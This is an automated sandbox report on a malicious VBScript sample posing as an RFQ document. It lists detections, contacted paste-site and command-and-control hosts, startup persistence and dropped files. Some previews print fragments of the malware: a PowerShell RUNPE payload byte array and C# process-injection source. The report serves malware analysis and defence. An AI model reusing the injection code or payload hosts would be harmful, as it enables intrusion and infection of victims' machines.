17.0.InstallUtil.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.0.InstallUtil.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.2.InstallUtil.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.0.InstallUtil.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1202861	Download File

Domains

Source	Detection	Scanner	Label	Link
textbin.net	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://textbin.net/raw/gia9ab2dg0	4%	Virustotal		Browse
https://textbin.net/raw/gia9ab2dg0	0%	Avira URL Cloud	safe
https://textbin.net/raw/gia9ab2dg00y	0%	Avira URL Cloud	safe
https://textbin.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
textbin.net	148.72.177.212	true	true	4%, Virustotal, Browse	unknown
sky01.publicvm.com	91.193.75.216	true	false		high
SQL8003.site4now.net	199.102.48.248	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://textbin.net/raw/gia9ab2dg0	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
sky01.publicvm.com	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000002.00000002.534601743.000001B3B5C2B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://textbin.net/raw/gia9ab2dg00y	powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.522337987.000001B3B4A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.491464852.000002464EBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.530065189.000001D38DE21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp	false		high
https://textbin.net	powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
148.72.177.212	textbin.net	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
91.193.75.216	sky01.publicvm.com	Serbia	209623	DAVID_CRAIGGG	false
199.102.48.248	SQL8003.site4now.net	United States	35937	ZCOLO-LAS01US	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	627719
Start date and time: 16/05/202219:28:00	2022-05-16 19:28:00 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Re-RFQ - PN List.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winVBS@22/28@3/4
EGA Information:	Successful, ratio: 25%
HDC Information:	Failed
HCA Information:	Successful, ratio: 90% Number of executed functions: 53 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .vbs Adjust boot time Enable AMSI Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): client.wns.windows.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, arc.msn.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
Execution Graph export aborted for target InstallUtil.exe, PID 1400 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6488 because it is empty
Execution Graph export aborted for target powershell.exe, PID 924 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:29:22	API Interceptor	1x Sleep call for process: wscript.exe modified
19:29:33	API Interceptor	190x Sleep call for process: powershell.exe modified
19:29:46	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
148.72.177.212	Requests Details.vbs	Get hash	malicious	Browse
	Info_Relev#U00e9_fiscal.vbs	Get hash	malicious	Browse
	Charter request details.vbs	Get hash	malicious	Browse
	TURBO COMPRESSOR PN#.vbs	Get hash	malicious	Browse
	Report Info.vbs	Get hash	malicious	Browse
	Purchase Report.vbs	Get hash	malicious	Browse
	WorkScope Details.vbs	Get hash	malicious	Browse
	Report Details.vbs	Get hash	malicious	Browse
	https://drive.google.com/file/d/1vKqgkFqErt3KNBSYpKzTqc8d-FJOoGhh/view?usp=drive_web	Get hash	malicious	Browse
	Uy6g30O93k.exe	Get hash	malicious	Browse
	Quick_Shipments(RE-ORDER)J7042.pdf.exe	Get hash	malicious	Browse
199.102.48.248	Requests Details.vbs	Get hash	malicious	Browse
	InfoReleveID0012551586503.vbs	Get hash	malicious	Browse
	Info_Releve_ID00215002501.vbs	Get hash	malicious	Browse
	InfoReleveID00215002504.vbs	Get hash	malicious	Browse
	InfoReleveID002155207.vbs	Get hash	malicious	Browse
	Info_Relev#U00e9_fiscal.vbs	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
textbin.net	Requests Details.vbs	Get hash	malicious	Browse	148.72.177.212
	Info_Relev#U00e9_fiscal.vbs	Get hash	malicious	Browse	148.72.177.212
	Charter request details.vbs	Get hash	malicious	Browse	148.72.177.212
	TURBO COMPRESSOR PN#.vbs	Get hash	malicious	Browse	148.72.177.212
	Report Info.vbs	Get hash	malicious	Browse	148.72.177.212
	Purchase Report.vbs	Get hash	malicious	Browse	148.72.177.212
	WorkScope Details.vbs	Get hash	malicious	Browse	148.72.177.212
	Report Details.vbs	Get hash	malicious	Browse	148.72.177.212
	https://drive.google.com/file/d/1vKqgkFqErt3KNBSYpKzTqc8d-FJOoGhh/view?usp=drive_web	Get hash	malicious	Browse	148.72.177.212
	Uy6g30O93k.exe	Get hash	malicious	Browse	148.72.177.212
	Quick_Shipments(RE-ORDER)J7042.pdf.exe	Get hash	malicious	Browse	148.72.177.212
	sale.xlsx	Get hash	malicious	Browse	51.79.99.124
	Z3h8gPFaOQ.exe	Get hash	malicious	Browse	51.79.99.124
	NPO19269453001.xlsx	Get hash	malicious	Browse	51.79.99.124
	New P0556785 1.xlsx	Get hash	malicious	Browse	51.79.99.124
	Kuxwf2elC7.exe	Get hash	malicious	Browse	51.79.99.124
	New PO6734.xlsx	Get hash	malicious	Browse	51.79.99.124
	Votre_Releve_Fiscal_Ameli.vbs	Get hash	malicious	Browse	51.79.99.124
	SRF854698801.vbs	Get hash	malicious	Browse	51.79.99.124
	djkizx.exe	Get hash	malicious	Browse	51.79.99.124
sky01.publicvm.com	Purchase Report.vbs	Get hash	malicious	Browse	91.193.75.175
	Invoice Order.vbs	Get hash	malicious	Browse	91.193.75.203
	download.dat.exe	Get hash	malicious	Browse	91.193.75.203
	Report Info.vbs	Get hash	malicious	Browse	91.193.75.203
	Flight Details.vbs	Get hash	malicious	Browse	91.193.75.253
	Signed Charter Agreement_Apr_08th_2022.vbs	Get hash	malicious	Browse	91.193.75.221

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DAVID_CRAIGGG	Requests Details.vbs	Get hash	malicious	Browse	91.193.75.143
	26gcw6zquf.PS1	Get hash	malicious	Browse	91.193.75.143
	vsQkhWCXxv.exe	Get hash	malicious	Browse	185.140.53.3
	OEc88DZdiO.exe	Get hash	malicious	Browse	91.193.75.132
	SecuriteInfo.com.Trojan.PackedNET.331.28355.exe	Get hash	malicious	Browse	91.193.75.133
	qs5yhVj1bE.exe	Get hash	malicious	Browse	91.193.75.221
	Ki8WlC0ddA.exe	Get hash	malicious	Browse	91.193.75.221
	xVDAUvl3Pn.exe	Get hash	malicious	Browse	91.193.75.134
	e1f388b8a086e034b1fbd94ca7341008.exe	Get hash	malicious	Browse	185.140.53.3
	CMACGM-WBINS9013246-20210714-125247.pdf.vbs	Get hash	malicious	Browse	91.193.75.131
	po-iteam DOO00076543.exe	Get hash	malicious	Browse	91.193.75.132
	Charter request details.vbs	Get hash	malicious	Browse	91.193.75.194
	SWIFT_poruka ERSTE BANK ad NOVI SAD.vbs	Get hash	malicious	Browse	91.193.75.133
	IMG2_455982134.exe	Get hash	malicious	Browse	185.140.53.174
	Purchase Report.vbs	Get hash	malicious	Browse	91.193.75.175
	BRINK GMBH BESTELLUNG _ ANFORDERUNG SH238429 12x2.5 mm#U00b2.exe	Get hash	malicious	Browse	185.140.53.72
	Scan 1000276325462 document.vbs	Get hash	malicious	Browse	91.193.75.131
	NEW ORDER 0522 202204280000883 pdf.vbs	Get hash	malicious	Browse	91.193.75.132
	commercial invoice.vbs	Get hash	malicious	Browse	185.165.153.84
	CHECK#718263.VBS	Get hash	malicious	Browse	185.140.53.12
AS-30083-GO-DADDY-COM-LLCUS	Requests Details.vbs	Get hash	malicious	Browse	148.72.177.212
	z3hir.arm	Get hash	malicious	Browse	209.126.105.236
	1RNa4Y6mPR	Get hash	malicious	Browse	50.30.34.6
	Info_Relev#U00e9_fiscal.vbs	Get hash	malicious	Browse	148.72.177.212
	form.xlsm	Get hash	malicious	Browse	50.30.40.196
	PO_04-29-2022_0929.lnk	Get hash	malicious	Browse	50.30.40.196
	PO_04-29-2022_0929.lnk	Get hash	malicious	Browse	50.30.40.196
	3ZhWeY0JJo.zip	Get hash	malicious	Browse	50.30.40.196
	Charter request details.vbs	Get hash	malicious	Browse	148.72.177.212
	TURBO COMPRESSOR PN#.vbs	Get hash	malicious	Browse	148.72.177.212
	Report Info.vbs	Get hash	malicious	Browse	148.72.177.212
	Purchase Report.vbs	Get hash	malicious	Browse	148.72.177.212
	form.xls	Get hash	malicious	Browse	50.30.40.196
	3866892832495839346959952.xls	Get hash	malicious	Browse	50.30.40.196
	form.xls	Get hash	malicious	Browse	50.30.40.196
	VEuIqlISMa.vbs	Get hash	malicious	Browse	50.30.40.196
	6874878548319557371921810184.lnk	Get hash	malicious	Browse	50.30.40.196
	5751879411642263817.doc.lnk	Get hash	malicious	Browse	50.30.40.196
	75744364019255557019031792.xls	Get hash	malicious	Browse	50.30.40.196
	91382109147537561.xls	Get hash	malicious	Browse	50.30.40.196

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	http://filebin.net/bxrgfgeddbwwntr9/U703.lnk	Get hash	malicious	Browse	148.72.177.212
	Copia Fattura.lnk	Get hash	malicious	Browse	148.72.177.212
	Electronic form.lnk	Get hash	malicious	Browse	148.72.177.212
	elenco 052864.lnk	Get hash	malicious	Browse	148.72.177.212
	Rechnungskorrektur.lnk	Get hash	malicious	Browse	148.72.177.212
	XVPUHUXIISL_#615430.VBS	Get hash	malicious	Browse	148.72.177.212
	Requests Details.vbs	Get hash	malicious	Browse	148.72.177.212
	teRjaWHV1Z.exe	Get hash	malicious	Browse	148.72.177.212
	PO-HKG-SVO-696-1.exe	Get hash	malicious	Browse	148.72.177.212
	Fattura n. 8139557 del 16.05.lnk	Get hash	malicious	Browse	148.72.177.212
	U621 lnk.lnk	Get hash	malicious	Browse	148.72.177.212
	arcjournals.com.lnk	Get hash	malicious	Browse	148.72.177.212
	ARC Scholarly Journals.lnk	Get hash	malicious	Browse	148.72.177.212
	ZUDR7365166078 invoice.lnk	Get hash	malicious	Browse	148.72.177.212
	ezUEYpQhNN.exe	Get hash	malicious	Browse	148.72.177.212
	YPDtDZozE3.exe	Get hash	malicious	Browse	148.72.177.212
	https://relaxhere.org/de/rotluseipovamaetm	Get hash	malicious	Browse	148.72.177.212
	U409.lnk	Get hash	malicious	Browse	148.72.177.212
	vaeNP8_1Pv_b(004).cmd	Get hash	malicious	Browse	148.72.177.212
	SmartNetITStore_SECOND.ps1	Get hash	malicious	Browse	148.72.177.212

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	72380
Entropy (8bit):	4.487269333453108
Encrypted:	false
SSDEEP:	768:DG/YDiYzl8cxJiaxr4ObGjITCTmUHh8hDhpjMWA1nDtWFnXyONzp208wSuPV0fFQ:ae9x1rNKKjgD8FniON9f+aNvHKW5/D
MD5:	C95C4C5AD07F648F678ADC868D188027
SHA1:	9C66D7C88D8E72F776031AE1F7BF91ACC7008461
SHA-256:	2EC7DE458E24B557DC21200CE248E299B89E9454A919464AEB6D3833EE10E8E3
SHA-512:	F667C30ED25A9C5228D4C84B82906E571E2F2A98F9E16922BD5ED1B04C0DC9CE55C4CCFCD1C6041F6DD2445293DC48CD71820330F048FD44F6D9F34CFBB79609
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: C:\Users\Public\gia9ab2dg0.PS1, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	.Add-Type -AssemblyName System.Windows.Forms..Add-Type -AssemblyName Microsoft.VisualBasic..Add-Type -AssemblyName Microsoft.CSharp..Add-Type -AssemblyName System.Management..Add-Type -AssemblyName System.Web....[Byte[]] $RUNPE = @(31,139,8,0,0,0,0,0,4,0,237,189,7,96,28,73,150,37,38,47,109,202,123,127,74,245,74,215,224,116,161,8,128,96,19,36,216,144,64,16,236,193,136,205,230,146,236,29,105,71,35,41,171,42,129,202,101,86,101,93,102,22,64,204,237,157,188,247,222,123,239,189,247,222,123,239,189,247,186,59,157,78,39,247,223,255,63,92,102,100,1,108,246,206,74,218,201,158,33,128,170,200,31,63,126,124,31,63,34,214,77,177,188,72,95,95,55,109,190,56,252,141,19,255,207,241,211,34,187,88,86,77,91,76,155,238,87,175,214,203,182,88,228,227,179,101,155,215,213,234,117,94,95,22,211,188,215,236,77,254,174,181,159,125,81,76,235,170,169,206,219,241,79,22,205,58,43,159,100,77,49,237,190,113,82,149,101,62,109,139,106,217,140,63,207,151,121,205,77,126,227,100,153,45,242,102,149,77,243,244,243,179,55,191,1

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, 61480 bytes, 1 file
Category:	dropped
Size (bytes):	61480
Entropy (8bit):	7.9951219482618905
Encrypted:	true
SSDEEP:	1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
MD5:	B9F21D8DB36E88831E5352BB82C438B3
SHA1:	4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
SHA-256:	998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
SHA-512:	D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
Malicious:	false
Preview:	MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4\|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D\|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......\|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU.....V.{V6..m..D.-\|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..\| .#.......I...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	modified
Size (bytes):	330
Entropy (8bit):	3.1283949652847367
Encrypted:	false
SSDEEP:	6:kKrtoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:TVkPlE99SNxAhUesE1
MD5:	11D4E7F875B93256FA99070078197E64
SHA1:	CB8FB5470849A11A500F34E52BC29485B255237F
SHA-256:	8F61FBFA1D7ED127BB5F6267CCA774F6F6936D5FC8AE1FA7AB84120A30E49D9A
SHA-512:	72525F4C8A15A6D1A1B063C25855DD770B9F3134926FE960AFB5D25A3F02A29AD93D23A58BA780C0FF7FBB892190D91BB60C227AAC1BFA015A848021A68CE829
Malicious:	false
Preview:	p...... ........9...i..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.340009400190196
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5:	CC144808DBAF00E03294347EADC8E779
SHA1:	A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256:	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512:	A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.884004042663719
Encrypted:	false
SSDEEP:	192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4n2Ca6pZlb4:ySib4q4dvEib42opbjvwRjdvRnrkjh4v
MD5:	BD615E1A2BC83828E536E020BD2D7DE9
SHA1:	340AF08B8BB60B52442FFE05FF8277C4276C8320
SHA-256:	B5285E108F6ED9D942F56E840A5DFCA938E65FBC64A18729DFD96BE71D878416
SHA-512:	90EC9D0E15D0D7609963BC7E19A2DE7B1D8B068460D2A0AA666D94E84360116868D19417F5C8D87E82D917CF6BC8BFFDEA8CDC73A86CD44419FFACA1E261D0E6
Malicious:	false
Preview:	PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1664
Entropy (8bit):	5.482563553285258
Encrypted:	false
SSDEEP:	48:mTrB4nqRL/HEekFnCvO9tC43uBSfMM9lH/MRNYqrIByjwAj:mTrqnObHba4Oe43uxGlHwNn0Bydj
MD5:	5F17A93CDAD157820E394DC0F3997CF8
SHA1:	8BD19C2C6BC495B18D5D9236816FE3CE840AA5F6
SHA-256:	FBC340A69AF22A3054D02AD484F41BD943A447769DE12A1612AF370918BEC203
SHA-512:	796E07E1F8C9CD8850FA1431784FD5AAAB046A102321240215C7AF152CEF01CD6AC55F1F512D9AD9B9B07F307504A6582A1C7CC849308B0949A76630A785DFCB
Malicious:	false
Preview:	@...e...........G....................................@..........4...............b..4.@.o.....G.......System.Web..H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..8................'....L..}............System.Numerics.4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D...........

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15102
Entropy (8bit):	4.763851296298132
Encrypted:	false
SSDEEP:	192:d4FazHgDRO2fwldsgNA/DxRry0at6knscDiF1u74+mFXqvFuI:+Fa9ldsgNeL1at6oslF1u2avN
MD5:	5B28648A4E188B0EBDF2D5EDCDA61624
SHA1:	FAF0BA6C2EF8D8184881EDA8A276796449969E1C
SHA-256:	E92ACAFC5A9DD128B120809AAF76178275C3D22B13FB7CC2F0D9C624BEFED1B1
SHA-512:	972FCA6205F8927363B751FF51C6CF07C3B42F7CBD8FBE12C1098DF539118ECF3D3CE1AF3B5D376C8710ED183786FC911279FF81941ABA4202A11CA5670B9937
Malicious:	false
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;..using System.Text;..using Microsoft.VisualBasic;..using System.Collections.Generic;....namespace GIT..{.. public sealed class Repository.. {.. public static void Execute(string path, byte[] payload).. {.. for (int i = 0; i < 5; i++).. {.. int readWrite = 0x0;.. NativeMethods.StartupInformation si = new NativeMethods.StartupInformation();.. NativeMethods.ProcessInformation pi = new NativeMethods.ProcessInformation();.. si.Size = (UInt32)(Marshal.SizeOf(typeof(NativeMethods.StartupInformation))); //Attention !.... try.. {.. bool createProc = NativeMethods.CreateProcessA(path, "", IntPtr.Zero, IntPtr.Zero, false, 0x00000004 \| 0x08000000, IntPtr.Zero, null, ref si, ref pi);.. if (!createProc).. {..

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.0468605295995275
Encrypted:	false
SSDEEP:	6:pAu+H2L/0DjuM3RLBPWdy1MZ915N723f1k+B0zxspRu6EXbB/N723f1k+b:p37L/UukvGZ91batk+B0cY6EXbBlatks
MD5:	F8CC808956A1DBA06C132EF9B10E2903
SHA1:	06C2D7CCF2DA17AA7A7663E016447864264BB0AA
SHA-256:	4144637C604F11CC6570E6A769692B3A30BCB3745E53024DDDCDD1C21D469DDB
SHA-512:	4AEECC91A06BCC94EAF09462BBF372DFD5D71A5D8A4854323FD18D53FF346C43A5D9FF03C9CDF0B2F803F290DA6B41895B8A623A49F990FBBAFA827BED23D785
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Management.dll" /R:"System.Windows.Forms.dll" /R:"mscorlib.dll" /R:"Microsoft.VisualBasic.dll" /out:"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll" /debug- /optimize+ /platform:X86 /unsafe /target:library "C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs"

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.022390817701844
Encrypted:	false
SSDEEP:	192:ZrwrEuvXuse9L9kJfpesGCFoOQejfvdLav63lktPGgK:ZeVesgL9OfYDCKejHdL136ugK
MD5:	989E1366E27A69F74476C3498AAAE89A
SHA1:	F9B7FDE729775B0644932B615AE04B3B008FFC9B
SHA-256:	F31D2B71489BB3A7728094B0A102200A26F98CE1F2A76FCF8FDB1816D3C540F5
SHA-512:	67BD7DE4CDECDFB0D214D146DFABF97C0AB402985D363A9873C169FF58B09CF1B50B387081AB3AA188FC8B444A2CB4890A431397B2794EC9FF99227F68D8AE25
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
